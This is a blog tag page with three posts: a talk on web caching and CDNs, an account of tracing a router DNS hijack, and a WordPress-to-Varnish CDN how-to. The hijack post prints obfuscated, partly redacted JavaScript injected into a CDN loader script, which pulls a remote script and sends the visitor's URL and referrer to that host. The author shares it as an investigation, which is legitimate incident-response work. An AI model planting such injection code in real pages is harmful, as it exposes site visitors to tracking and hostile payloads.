Posts Tagged ‘cdn’

When to Cache, What to Cache, How to Cache

Tuesday, June 21st, 2011

This post is a version of the slideshow presentation I did at Hack and Tell in Fort Lauderdale, Florida at The Collide Factory on Saturday, April 2, 2011. These are 5 minute talks where each slide auto-advances after fifteen seconds which limits the amount of detail that can be conveyed.

A brief introduction

What makes a page load quickly? While we can look at various metrics, there are quite a few things that impact pageloads. While the page can be served quickly, the design of the page can often times impact the way that the page is rendered in the browser which can make a site appear to be sluggish. However, we’re going to focus on the mechanics of what it takes to get a page to serve quickly.

The Golden Rule – do as few calculations as possible to hand content to your surfer.

But my site is dynamic!

Do you really need to calculate the last ten posts entered on your blog every time someone visits the page? Surely you could cache that and purge the cache when a new post is entered. When someone adds a new comment, purge the cache and let it be recalculated once.

But my site has user personalization!

Can that personalization be broken into it’s own section of the webpage? Or, is it created by a cacheable function within your application? Even if you don’t support fragment caching on the edge, you can emulate that by caching your expensive SQL queries or even portions of your page.

Even writing a generated file to a static file and allowing your webserver to serve that static file provides an enormous boost. This is what most of the caching plugins for WordPress do. However, they are page caching, not fragment caching, which means that the two most expensive queries that WordPress executes, Category list and Tag Cloud, are generated each time a new page is hit until that page is cached.

One of the problems with high performance sites is the never-ending quest for that Time to First Byte. Each load balancer or proxy in front adds some latency. It also means a page needs to be pre-constructed before it is served, or, you need to do a little trickery. This eliminates being able to do any dynamic processing on the page in order to hand a response back as quickly as possible unless you’ve got plenty of spare computing horsepower.

With this, we’re left with a few options to have a dynamic site that has the performance of a statically generated site.

Amazon was one of the first to embrace the Page and Block method by using Mason, a mod_perl based framework. Each of the blocks on the page was generated ahead of time, and only the personalized blocks were generated ‘late’. This allowed the frontend to assemble these pieces, do minimal work to display the personal recommendations and present the page quickly.

Google took a different approach by having an immense amount of computing horsepower behind their results. Google’s method probably isn’t cost effective for most sites on the Internet.

Facebook developed bigpipe which generates pages and then dynamically loads portions of the page into the DOM units. This makes the page load quickly, but in stages. The viewer sees the rough page quickly as the rest of the page fills in.

The Presentation begins here

Primary Goal

Fast Pageloads – We want the page to load quickly and render quickly so that the websurfer doesn’t abandon the site.

Increased Scalability – Once we get more traffic, we want the site to be able to scale and provide websurfers with a consistent, fast experience while the site grows.

Metrics We Use

Time to First Byte – This is a measure of how quickly the site responds to an incoming request and starts sending the first byte of data. Some sites have to take time to analyze the request, build the page, etc before sending any data. This lag results in the browser sitting there with a blank screen.

Time to Completion – We want the entire page to load quickly enough that the web surfer doesn’t abandon. While we can do some tricky things with chunked encoding to fool websurfers into thinking our page loads more quickly than it really does, for 95% of the sites, this is a decent metric.

Number of Requests – The total number of requests for a page is a good indicator of overall performance. Since most browsers will only request a handful of static assets from a page per hostname, we can use a CDN, embed images in CSS or use Image Sprites to reduce the number of requests.

Why Cache?

Expecting Traffic

When we have an advertising campaign or holiday promotion going on, we don’t know what our expected traffic level might be, so, we need to prepare by having the caching in place.

Receiving Traffic

If we receive unexpected publicity, or our site is listed somewhere, we might cache to allow the existing system to survive a flood of traffic.

Fighting DDOS

When fighting a Distributed Denial of Service Attack, we might use caching to avoid the backend servers from getting overloaded.

Expecting Traffic

There are several types of caching we can do when we expect to receive traffic.

* Page Cache – Varnish/Squid/Nginx provide page caching. A static copy of the rendered page is held and updated from time to time either by the content expiring or being purged from the cache.
* Query Cache – MySQL includes a query cache that can help on repetitive queries.
* Wrap Queries with functions and cache – We can take our queries and write our own caching using a key/value store, avoiding us having to hit the database backend.
* Wrap functions with caching – In Python, we can use Beaker to wrap a decorator around a function which does the caching magic for us. Other languages have similar facilities.

Receiving Traffic

* Page Caching – When we’re receiving traffic, the easiest thing to do is to put a page cache in place to save the backend/database servers from getting overrun. We lose some of the dynamic aspects, but, the site remains online.

* Fragment Caching – With fragment caching, we can break the page into zones that have separate expiration times or can be purged separately. This can give us a little more control over how interactive and dynamic the site appears while it is receiving traffic.

DDOS Handling

* Slow Client/Vampire Attacks – Certain DDOS attacks cause problems with some webserver software. Recent versions of Apache and most event/poll driven webservers have protection against this.
* Massive Traffic – With some infrastructures, we’re able to filter out the traffic ahead of time – before it hits the backend.

Caching Easy, Purging Hard

Caching is scaleable. We can just add more caching servers to the pool and keep scaling to handle increased load. The problem we run into is keeping a site interactive and dynamic as content needs to be updated. At this point, purging/invalidating cached pages or regions requires communication with each cache.

Page Caching

Some of the caching servers that work well are Varnish, Squid and Nginx. Each of these allows you to do page caching, specify expire times, and handle most requests without having to talk to the backend servers.

Fragment Caching

With Edge Side Includes or a Page and Block Construction can allow you to cache pieces of the page as shown in the following diagram. With this, we can individually expire pieces of the page and allow our front end cache, Varnish, to reassemble the pieces to serve to the websurfer.

Cache Methods

* Hardware – Hard drives contain caches as do many controller cards.
* SQL Cache – adding memory to keep the indexes in memory or enabling the SQL query cache can help.
* Redis/Memcached – Using a key/value store can keep requests from hitting rotational media (disks)
* Beaker/Functional Caching – Either method can use a key/value store, preferably using RAM rather than disk, to prevent requests from having to hit the database backend.
* Edge/Frontend Caching – We can deploy a cache on the border to reduce the number of requests to the backend.

OS Buffering/Caching

* Hardware Caching on drive – Most hard drives today have caches – finding one with a large cache can help.
* Caching Controller – If you have a large ‘hot set’ of data that changes, using a caching controller can allow you to put a gigabyte or more RAM to avoid having to hit the disk for requests. Make sure you get the battery backup card just in case your machine loses power – those disk writes are often reported as completed before they are physically written to the disk.
* Linux/FreeBSD/Solaris/Windows all use RAM for caching

MySQL Query Cache

The MySQL Query cache is simple yet effective. It isn’t smart and doesn’t cache based on query plan, but, if your code base executes queries where the arguments are in the same order, it can be quite a plus. If you are dynamically creating queries, assembling the queries to try and keep the conditions in the same order will help.


* Key Value Store – you can store frequently requested data in memory.
* Nginx can read rendered pages right from Memcached.

Both methods use RAM rather than hitting slower disk media.

Beaker/Functional Caching

With Python, we can use the Beaker decorator to specify caching. This insulates us from having to write our own handler.

Edge/Front End Caching

* Define blocks that can be cached, portions of the templates.
* Page Caching
* JSON (CouchDB) – Even JSON responses can run behind Varnish.
* Bigpipe – Cache the page, and allow javascript to assemble the page.

Content Delivery Network (CDN)

When possible, use a Content Delivery Network to store static assets off net. This adds a separate hostname and sometimes a separate domain name which allows most browsers to fetch more resources at the same time. Preferably you want to use a separate domain name that won’t have any cookies set – which cuts down on the size of the request object sent from the browser to the server with the static assets.


Facebook uses a technology called Bigpipe which caches the page template and the javascript required to build the page. Once that has loaded, Javascript fetches the data and builds the page. Some of the json data requested is also cached, leading to a very compact page being loaded and built while you’re viewing the page.

Google’s Answer

Google has spent many years building a tremendous distributed computer. When you request a site, their frontend servers use a deadline scheduler and request blocks from their advertising, personalization, search results and other page blocks. The page is then assembled and returned to the web surfer. If any block doesn’t complete quickly enough, it is left out from assembly – which motivates the advertising department to make sure their block renders quickly.

What else can we do?

* Reduce the number of calculations required to serve a page
* Reduce the number of disk operations
* Reduce the network Traffic

In general, do as few calculations as possible while handing the page to the surfer.

Man in the Middle Attack

Sunday, October 10th, 2010

A few days ago a client had a window opened up in their browser with an Ip address and a query string parameter with his domain name. He asked me if his wordpress site had been hacked. I took a look through the files on the disk, dumped the database and did a grep, looked around the site using Chrome, Firefox and Safari and saw nothing. I even used Firefox to view generated source as sometimes scripts utilize the fact that JQuery is already loaded to load their extra payload through a template or addon.

Nothing. He runs a mac, his wife was having the same issue. I recalled the issue with the recent Adobe Flash plugin, but, he said something that was very confusing – our IPad’s do it too.

No Flash on IPad, can’t install most of the toolbar code on the IPad due to a fairly tight sandbox and the same behavior across multiple machines. Even machines that weren’t accessing his site were popping up windows/tabs in Safari.

I had him check his System Preferences, TCP/IP and the DNS settings and he read the numbers. The last one of seemed odd, but, wouldn’t normally cause an issue since isn’t routed. The other two DNS server IPs were read off and written down. Doing a reverse IP lookup resulted in a Not Found. Since he was on RoadRunner, I found that a bit odd, so, I did a whois and found out that both of the IP addresses listed as DNS were hosted in Russia.

Now we’re getting somewhere. The settings on his machine were grabbed from DHCP, so, that meant his router was probably set to use those servers. Sure enough, we logged in with the default username/password of admin/password, looked at the first page and there they were. We modified them to use google’s resolvers and changed the password on the router to something a little more secure.

We checked a few settings in the Linksys router and remote web access wasn’t enabled, so, the only way it could have happened is a Javascript exploit that logged into the router and made the changes. However, now the fun began. Trying to figure out what was actually intercepted. Since I had a source site that I knew caused issues, through some quick investigative work, we find a number of external URLs loaded on his site that might be common enough and small enough to be of interest. Since we know that particular scripts require jQuery, we can look at anything that calls something external in his source.

First thought was the Twitter sidebar, but, that calls Twitter directly which means all of that traffic would have to be proxied. Certainly wouldn’t want to do that when you have limited bandwidth. Feedburner seemed like a potential vector, but, probably very limited access and those were hrefs, so, they would have had to have been followed. The Feedburner widget wasn’t present. seemed like a reasonable target, but, the DNS for it through the Russian DNS servers and other resolvers was the same. That isn’t to say that they couldn’t change it on a per request basis to balance for traffic, but, we’re going on the assumption it’ll be a fire and forget operation.

After looking through, statcounter could have been a suspect, but, again the DNS entries appeared to be the same, however, it does fit the criteria of a small javascript on a page that might have jquery.

However, the next entry appeared to be a good candidate. which requires jquery and loads a small javascript. DNS entries are different – though, we could attribute that to the fact it is a CDN, but, we get a CNAME from google’s resolvers, and an IN A record from the suspect DNS servers.

The Loader.js contains a tiny bit of extra code at the bottom containing:

var xxxxxx_html = '';
    xxxxxx_html += '<scr ' + 'ipt language="JavaSc' + 'ript" ';
    xxxxxx_html += 'src="http://xx' + '';
    xxxxxx_html += '&dd=3&url=' + encodeURIComponent(document.location);
    xxxxxx_html += '&ref=' + encodeURIComponent(document.referrer);
    xxxxxx_html += '&rnd=' + Math.random() + '"></scr>';

I did a few checks to see if I could find any other hostnames that they had filtered, but, wasn’t able to find anything with a quick glance. Oh, and these guys minified the javascript – even though wibiya didn’t. And no, the server hosting the content was in the USA, only the DNS server was outside the USA.

After years of reading about this type of attack, it is the first time I was able to witness it first-hand.

Converting to a Varnish CDN with WordPress

Sunday, October 11th, 2009

While working with Varnish I decided to try an experiment. I knew that Varnish could assist sites, but, it has never been easy to run Varnish on a shared virtual or clustered virtual host. VPS or Dedicated servers are no problem because you can do some configuration. However, in this case, I wanted to see if we could use Varnish to emulate a CDN, and if so, how difficult would it be for wordpress.

As it turns out, WordPress has a particular capability built in that handles media uploads. In the admin, under Settings, Miscellaneous, there are two values. One that asks where uploads should be stored. That path is a relative path under your blog’s home directory. The second is the URL that points to that path. In most cases you need to leave this blank, but, we can use that to point the URL for images to use the CDN.

Settings, Miscellaneous

Store uploads in this folder: wp-content/uploads
Full URL path to files:

Second, all of the images that have been already posted need to have their URLs modified. Since I am a command line guy, I executed the following command in MySQL.

update wp_posts set post_content=replace(post_content,'','');

According to the Yahoo YSlow plugin, my blog went from a 72 to a 98 out of 100 with this and a few other modifications. The site does appear to be much snappier as well.

Entries (RSS) and Comments (RSS).
Cluster host: li